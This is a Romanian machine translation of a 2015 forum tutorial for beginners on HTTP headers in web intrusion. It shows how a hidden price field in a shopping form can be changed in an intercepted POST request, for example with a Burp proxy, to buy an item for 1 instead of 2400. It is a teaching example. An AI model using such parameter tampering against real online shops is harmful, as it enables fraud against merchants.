Acest articol este un articol oglindă al traducerii automate, vă rugăm să faceți clic aici pentru a sări la articolul original.

Architect_Programmer_Code Rețeaua Agricolă»Arhitect Alte tehnologii Ofensivă și defensivă sigură Penetrarea intruziunii: Aplicarea antetelor HTTP
Vedere: 12586|Răspunde: 0

[Tutorial de siguranță] Penetrarea intruziunii: Aplicarea antetelor HTTP

[Copiază linkul]
Postat pe 07.02.2015 17:59:07 | | |

Despre aplicarea antetelor HTTP

Antetul http este folosit frecvent în mecanismul de transmisie al site-urilor web, dar majoritatea începătorilor din China nu au observat această parte; acest articol este dedicat doar începătorilor, rolului antetului http în procesul de intruziune.

Luați pagina de cumpărături ca exemplu pentru a analiza o mică parte din rolul antetelor HTTP.

Mai întâi, să analizăm un formular de pe pagina de cumpărături.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<input type="hidden" name="price" value="449">

<input type="submit" value="Buy">

</form>

În timpul deschiderii, fă o captură de ecran a antetului mesajului http și aruncă o privire

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

cantitate=1&preț=2400

Deși câmpul preț nu este afișat pe pagină la deschiderea paginii de cumpărături, acesta poate fi totuși editat și operat de utilizator.

Există două moduri de a realiza editarea

1. Salvează codul sursă HTML pentru modificare, apoi îl reîncarcă în browser pentru a rula

2. Folosirea interceptării proxy pentru a modifica anteturile HTTP (construcția proxy-ului în tool burp)

Luați ca exemplu antetul HTTP de mai sus
Înainte de schimbare
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

cantitate=1&preț=2400

După schimbare
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

cantitate=1&preț=1


În ultima linie, câmpul Preț are o valoare de 2400 și dacă îl schimbăm la 1 putem lua iPhone 4S la un preț mai mic.

Acest articol oferă doar o idee despre câștiguri neașteptate, cum ar fi injecția cu LDAP.




Precedent:Metoda de implementare a parolei pentru recuperarea parolei uitată MySQL
Următor:Injecția SQL pentru a obține calea completă a site-ului

Postări conexe
Disclaimer:
Tot software-ul, materialele de programare sau articolele publicate de Code Farmer Network sunt destinate exclusiv scopurilor de învățare și cercetare; Conținutul de mai sus nu va fi folosit în scopuri comerciale sau ilegale, altfel utilizatorii vor suporta toate consecințele. Informațiile de pe acest site provin de pe Internet, iar disputele privind drepturile de autor nu au legătură cu acest site. Trebuie să ștergi complet conținutul de mai sus de pe calculatorul tău în termen de 24 de ore de la descărcare. Dacă îți place programul, te rugăm să susții software-ul autentic, să cumperi înregistrarea și să primești servicii autentice mai bune. Dacă există vreo încălcare, vă rugăm să ne contactați prin e-mail.
Mail To:help@itsvse.com